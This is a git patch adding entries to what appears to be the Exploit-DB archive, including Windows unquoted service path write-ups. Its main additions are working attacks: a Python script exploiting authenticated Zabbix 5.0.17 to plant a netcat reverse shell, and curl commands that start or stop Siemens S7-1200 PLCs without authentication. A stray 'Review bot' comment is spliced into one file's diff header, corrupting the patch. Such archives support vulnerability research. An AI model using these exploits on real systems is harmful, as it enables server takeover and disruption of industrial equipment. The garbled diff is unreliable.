From 88a02fb8d81b3dd9e8ee11162832072f7e370596 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 11 Mar 2022 05:01:39 +0000
Subject: [PATCH] DB: 2022-03-11
8 changes to exploits/shellcodes
Sony playmemories home - 'PMBDeviceInfoProvider' Unquoted Service Path
McAfee(R) Safe Connect VPN - Unquoted Service Path Elevation Of Privilege
BattlEye 0.9 - 'BEService' Unquoted Service Path
WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path
Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path
Siemens S7-1200 - Unauthenticated Start/Stop Command
Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)
---
 exploits/hardware/remote/50793.txt | 1 -
 exploits/hardware/remote/50820.txt | 16 +++
 exploits/php/webapps/50816.py | 151 +++++++++++++++++++++++++++++
 exploits/windows/local/50814.txt | 29 ++++++
 exploits/windows/local/50815.txt | 29 ++++++
 exploits/windows/local/50817.txt | 31 ++++++
 exploits/windows/local/50818.txt | 24 +++++
 exploits/windows/local/50819.txt | 24 +++++
 files_exploits.csv | 7 ++
 9 files changed, 311 insertions(+), 1 deletion(-)
 create mode 100644 exploits/hardware/remote/50820.txt
 create mode 100755 exploits/php/webapps/50816.py
 create mode 100644 exploits/windows/local/50814.txt
 create mode 100644 exploits/windows/local/50815.txt
 create mode 100644 exploits/windows/local/50817.txt
 create mode 100644 exploits/windows/local/50818.txt
 create mode 100644 exploits/windows/local/50819.txt
diff --git a/exploits/hardware/remote/50793.txt b/exploits/hardware/remote/50793.txt
index fb2a9119b..700ad8cf3 100644
--- a/exploits/hardware/remote/50793.txt
+++ b/exploits/hardware/remote/50793.txt
@@ -4,7 +4,6 @@
 # Vendor Homepage: https://www.wago.com
 # Version: Firmware version 03.05.10(17)
 # Tested on: PopOS! [Linux](Firefox)
-# CVE : CVE-2021-46388
 ======================================== = The ordinary user privilege request:
diff --git a/exploits/hardware/remote/50820.txt b/exploits/hardware/remote/50820.txt
new file mode 100644
index 000000000..5f0eb5710
--- /dev/null
+++ b/exploits/hardware/remote/50820.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Unauthenticated Siemens S7-1200 CPU Start/Stop Command
+# Date: 09/03/2022
+# Exploit Author: RoseSecurity
+# Vendor Homepage: https://www.siemens.com/global/en.html
+# Version: V4.5 and below
+# Tested on: Siemens S7-1200 (CPU: 1215C)
+
+# IP == PLC IP address
+
+# Start Command
+
+curl -i -s -k -X $'POST' \ -H $'Host: ' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http:///Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Start' \ 'http:///CPUCommands'
+
+# Stop Command
+
+curl -i -s -k -X $'POST' \ -H $'Host: ' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http:///Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Stop' \ 'http:///CPUCommands'
\ No newline at end of file
diff --git a/exploits/php/webapps/50816.py b/exploits/php/webapps/50816.py
new file mode 100755
index 000000000..8dffb7169
--- /dev/null
+++ b/exploits/php/webapps/50816.py
@@ -0,0 +1,151 @@
+# Exploit Title: Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)
+# Date: 9/3/2022
+# Exploit Author: Hussien Misbah
+# Vendor Homepage: https://www.zabbix.com/
+# Software Link: https://www.zabbix.com/rn/rn5.0.17
+# Version: 5.0.17
+# Tested on: Linux
+# Reference: https://github.com/HussienMisbah/tools/tree/master/Zabbix_exploit
+
+#!/usr/bin/python3
+# note : this is blind RCE so don't expect to see results on the site
+# this exploit is tested against Zabbix 5.0.17 only
+
+import sys
+import requests
+import re
+import random
+import string
+import colorama
+from colorama import Fore
+
+
+print(Fore.YELLOW+"[*] this exploit is tested against Zabbix 5.0.17 only")
+print(Fore.YELLOW+"[*] can reach the author @ https://hussienmisbah.github.io/")
+
+
+def item_name() :
+ letters = string.ascii_letters
+ item = ''.join(random.choice(letters) for i in range(20))
+ return item
+
+if len(sys.argv) != 6 :
+ print(Fore.RED +"[!] usage : ./expoit.py ")
+ sys.exit(-1)
+
+url = sys.argv[1]
+username =sys.argv[2]
+password = sys.argv[3]
+host = sys.argv[4]
+port = sys.argv[5]
+
+
+s = requests.Session()
+
+
+headers ={
+"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
+}
+
+data = {
+"request":"hosts.php",
+"name" : username ,
+"password" : password ,
+"autologin" :"1" ,
+"enter":"Sign+in"
+}
+
+
+proxies = {
+ 'http': 'http://127.0.0.1:8080'
+}
+
+
+r = s.post(url+"/index.php",data=data) #proxies=proxies)
+
+if "Sign out" not in r.text :
+ print(Fore.RED +"[!] Authentication failed")
+ sys.exit(-1)
+if "Zabbix 5.0.17" not in r.text :
+ print(Fore.RED +"[!] This is not Zabbix 5.0.17")
+ sys.exit(-1)
+
+if "filter_hostids%5B0%5D=" in r.text :
+ try :
+ x = re.search('filter_hostids%5B0%5D=(.*?)"', r.text)
+ hostId = x.group(1)
+ except :
+ print(Fore.RED +"[!] Exploit failed to resolve HostID")
+ print(Fore.BLUE +"[?] you can find it under /items then add item")
+ sys.exit(-1)
+else :
+ print(Fore.RED +"[!] Exploit failed to resolve HostID")
+ print(Fore.BLUE +"[?] you can find HostID under /items then add item")
+ sys.exit(-1)
+
+
+sid= re.search('',r.text).group(1) # hidden_csrf_token
+
+
+command=f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {host} {port} >/tmp/f"
+
+payload = f"system.run[{command},nowait]"
+Random_name = item_name()
+data2 ={
+
+"sid":sid,"form_refresh":"1","form":"create","hostid":hostId,"selectedInterfaceId":"0","name":Random_name,"type":"0","key":payload,"url":"","query_fields[name][1]":"","query_fields[value][1]":"","timeout":"3s","post_type":"0","posts":"","headers[name][1]":"","headers[value][1]":"","status_codes":"200","follow_redirects":"1","retrieve_mode":"0","http_proxy":"","http_username":"","http_password":"","ssl_cert_file":"","ssl_key_file":"","ssl_key_password":"","interfaceid":"1","params_es":"","params_ap":"","params_f":"","value_type":"3","units":"","delay":"1m","delay_flex[0][type]":"0","delay_flex[0][delay]":"","delay_flex[0][schedule]":"","delay_flex[0][period]":"","history_mode":"1","history":"90d","trends_mode":"1","trends":"365d","valuemapid":"0","new_application":"","applications[]":"0","inventory_link":"0","description":"","status":"0","add":"Add"
+}
+
+r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"} )
+
+
+no_pages= r2.text.count("?page=")
+
+#################################################[Searching in all pages for the uploaded item]#################################################
+page = 1
+flag=False
+while page <= no_pages :
+ r_page=s.get(url+f"/items.php?page={page}" ,headers=headers )
+ if Random_name in r_page.text :
+ print(Fore.GREEN+"[+] the payload has been Uploaded Successfully")
+ x2 = re.search(rf"(\d+)[^\d]>{Random_name}",r_page.text)
+ try :
+ itemId=x2.group(1)
+ except :
+ pass
+
+ print(Fore.GREEN+f"[+] you should find it at {url}/items.php?form=update&hostid={hostId}&itemid={itemId}")
+ flag=True
+ break
+
+ else :
+ page +=1
+
+if flag==False :
+ print(Fore.BLUE +"[?] do you know you can't upload same key twice ?")
+ print(Fore.BLUE +"[?] maybe it is already uploaded so set the listener and wait 1m")
+ print(Fore.BLUE +"[*] change the port and try again")
+ sys.exit(-1)
+
+#################################################[Executing the item]#################################################
+
+
+data2["form"] ="update"
+data2["selectedInterfaceId"] = "1"
+data2["check_now"]="Execute+now"
+data2.pop("add",None)
+data2["itemid"]=itemId,
+
+print(Fore.GREEN+f"[+] set the listener at {port} please...")
+
+r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"}) # ,proxies=proxies )
+
+print(Fore.BLUE+ "[?] note : it takes up to +1 min so be patient :)")
+answer =input(Fore.BLUE+"[+] got a shell ? [y]es/[N]o: ")
+
+if "y" in answer.lower() :
+ print(Fore.GREEN+"Nice !")
+else :
+ print(Fore.RED+"[!] if you find out why please contact me ")
+
+sys.exit(0)
\ No newline at end of file
diff --git a/exploits/windows/local/50814.txt b/exploits/windows/local/50814.txt
new file mode 100644
index 000000000..b58ba9c0f
--- /dev/null
+++ b/exploits/windows/local/50814.txt
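Review bot: The `#!/usr/bin/python3` line is placed on line 10 of the new file, after the exploit-db header comments, so it is only a comment and the file's `100755` mode will not make a shell run it with Python; it belongs on line 1 (with the header moved below it) or should be dropped. The two bare `except :` blocks (HostID resolution, and the `itemId` lookup inside the page loop) catch everything including `KeyboardInterrupt`; the failure actually expected there is `re.search` returning `None`, so `except AttributeError:` is the narrower choice, and the `pass` in the second block means a miss surfaces later as a `NameError` on `itemId` instead of the intended message. The `proxies` dict and the bare `import colorama` are dead code, since every `proxies=` use is commented out and only `Fore` is referenced.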
@@ -0,0 +1,29 @@
+# Exploit Title: McAfee® Safe Connect VPN - Unquoted Service Path Elevation Of Privilege
+# Date: 09/03/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.mcafee.com/
+# Software Link: https://www.mcafee.com/en-us/vpn/mcafee-safe-connect.html
+# Version: 2.13
+# Tested: Windows 10 x64
+# Contact: https://twitter.com/dmaral3noz
+
+C:\Users\saudh>sc qc SafeConnectService
+
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: SafeConnectService
+
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\McAfee\McAfee Safe Connect\SafeConnect.ServiceHost.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : McAfee Safe Connect Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/50815.txt b/exploits/windows/local/50815.txt
new file mode 100644
index 000000000..856663bb5
--- /dev/null
+++ b/exploits/windows/local/50815.txt
@@ -0,0 +1,29 @@
+# Exploit Title: BattlEye 0.9 - 'BEService' Unquoted Service Path
+# Date: 09/03/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.battleye.com/
+# Software Link: https://www.battleye.com/downloads/
+# Version: 0.94
+# Tested: Windows 10 Pro
+# Contact: https://twitter.com/dmaral3noz
+
+
+C:\Users\saudh>sc qc BEService
+
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: BEService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 3 DEMAND_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : BattlEye Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/50817.txt b/exploits/windows/local/50817.txt
new file mode 100644
index 000000000..42f4cbc49
--- /dev/null
+++ b/exploits/windows/local/50817.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Sony playmemories home - 'PMBDeviceInfoProvider' Unquoted Service Path
+# Date: 09/03/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.sony.com/
+# Software Link: https://support.d-imaging.sony.co.jp/www/disoft/int/download/playmemories-home/win/en/index.html
+# Version: 6.0
+# Tested: Windows 10 Pro
+# Contact: https://twitter.com/dmaral3noz
+
+
+C:\Users\saudh>sc qc PMBDeviceInfoProvider
+
+[SC] QueryServiceConfig SUCCESS
+
+
+SERVICE_NAME: PMBDeviceInfoProvider
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : PMBDeviceInfoProvider
+ DEPENDENCIES : RPCSS
+ SERVICE_START_NAME : LocalSystem
+
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/local/50818.txt b/exploits/windows/local/50818.txt
new file mode 100644
index 000000000..25f8a8980
--- /dev/null
+++ b/exploits/windows/local/50818.txt
@@ -0,0 +1,24 @@
+# Exploit Title: WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path
+# Exploit Author: Antonio Cuomo (arkantolo)
+# Exploit Date: 2022-03-09
+# Vendor : ilwebmaster21
+# Version : WOW21_Service 5.0.1.9
+# Vendor Homepage : https://wow21.life/
+# Tested on OS: Windows 10 Pro x64
+
+#PoC :
+==============
+
+C:\>sc qc WOW21_Service
+[SC] QueryServiceConfig OPERAZIONI RIUSCITE
+
+NOME_SERVIZIO: WOW21_Service
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_AVVIO : 2 AUTO_START
+ CONTROLLO_ERRORE : 1 NORMAL
+ NOME_PERCORSO_BINARIO : C:\Program Files\WOW21\WOW21_Service.exe
+ GRUPPO_ORDINE_CARICAMENTO :
+ TAG : 0
+ NOME_VISUALIZZATO : WOW21_Service
+ DIPENDENZE :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/50819.txt b/exploits/windows/local/50819.txt
new file mode 100644
index 000000000..c08811bf4
--- /dev/null
+++ b/exploits/windows/local/50819.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path
+# Exploit Author: Antonio Cuomo (arkantolo)
+# Exploit Date: 2022-03-09
+# Vendor : David Xanatos
+# Version : SbieSvc 5.50.2
+# Vendor Homepage : https://sandboxie-plus.com/
+# Tested on OS: Windows 10 Pro x64
+
+#PoC :
+==============
+
+C:\>sc qc SbieSvc
+[SC] QueryServiceConfig OPERAZIONI RIUSCITE
+
+NOME_SERVIZIO: SbieSvc
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_AVVIO : 2 AUTO_START
+ CONTROLLO_ERRORE : 1 NORMAL
+ NOME_PERCORSO_BINARIO : C:\Program Files\Sandboxie-Plus\SbieSvc.exe
+ GRUPPO_ORDINE_CARICAMENTO : UIGroup
+ TAG : 0
+ NOME_VISUALIZZATO : Sandboxie Service
+ DIPENDENZE :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 3d36e34b7..255d64cc3 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11457,6 +11457,7 @@ id,file,description,date,author,type,platform,port
 50789,exploits/windows/local/50789.py,"Cobian Reflector 0.9.93 RC1 - 'Password' Denial of Service (PoC)",1970-01-01,"Luis Martínez",local,windows,
 50790,exploits/windows/local/50790.py,"Cobian Backup 11 Gravity 11.2.0.582 - 'Password' Denial of Service (PoC)",1970-01-01,"Luis Martínez",local,windows,
 50791,exploits/windows/local/50791.txt,"Cobian Backup Gravity 11.2.0.582 - 'CobianBackup11' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
+50817,exploits/windows/local/50817.txt,"Sony playmemories home - 'PMBDeviceInfoProvider' Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
 50804,exploits/windows/local/50804.txt,"Private Internet Access 3.3 - 'pia-service' Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
 50805,exploits/windows/local/50805.txt,"Cloudflare WARP 1.4 - Unquoted Service Path",1970-01-01,"Hejap Zairy Al-Sharif",local,windows,
 50806,exploits/windows/local/50806.txt,"Malwarebytes 4.5 - Unquoted Service Path",1970-01-01,"Hejap Zairy Al-Sharif",local,windows,
@@ -11466,6 +11467,10 @@ id,file,description,date,author,type,platform,port
 50811,exploits/windows/local/50811.py,"Audio Conversion Wizard v2.01 - Buffer Overflow",1970-01-01,"Hejap Zairy Al-Sharif",local,windows,
 50812,exploits/windows/local/50812.cs,"Printix Client 1.3.1106.0 - Privilege Escalation",1970-01-01,"Logan Latvala",local,windows,
 50813,exploits/windows/local/50813.txt,"Wondershare Dr.Fone 12.0.18 - 'Wondershare InstallAssist' Unquoted Service Path",1970-01-01,"Mohamed Alzhrani",local,windows,
+50814,exploits/windows/local/50814.txt,"McAfee(R) Safe Connect VPN - Unquoted Service Path Elevation Of Privilege",1970-01-01,"Saud Alenazi",local,windows,
+50815,exploits/windows/local/50815.txt,"BattlEye 0.9 - 'BEService' Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
+50818,exploits/windows/local/50818.txt,"WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
+50819,exploits/windows/local/50819.txt,"Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -18641,6 +18646,7 @@ id,file,description,date,author,type,platform,port
 50793,exploits/hardware/remote/50793.txt,"WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation",1970-01-01,"Momen Eldawakhly",remote,hardware,
 50796,exploits/windows/remote/50796.html,"Prowise Reflect v1.0.9 - Remote Keystroke Injection",1970-01-01,"Rik Lutz",remote,windows,
 50798,exploits/windows/remote/50798.cs,"Printix Client 1.3.1106.0 - Remote Code Execution (RCE)",1970-01-01,"Logan Latvala",remote,windows,
+50820,exploits/hardware/remote/50820.txt,"Siemens S7-1200 - Unauthenticated Start/Stop Command",1970-01-01,RoseSecurity,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -44883,3 +44889,4 @@ id,file,description,date,author,type,platform,port
 50802,exploits/php/webapps/50802.py,"Attendance and Payroll System v1.0 - SQLi Authentication Bypass",1970-01-01,pr0z,webapps,php,
 50803,exploits/multiple/webapps/50803.py,"Hasura GraphQL 2.2.0 - Information Disclosure",1970-01-01,"Dolev Farhi",webapps,multiple,
 50809,exploits/linux/webapps/50809.py,"Webmin 1.984 - Remote Code Execution (Authenticated)",1970-01-01,faisalfs10x,webapps,linux,
+50816,exploits/php/webapps/50816.py,"Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Hussien Misbah",webapps,php,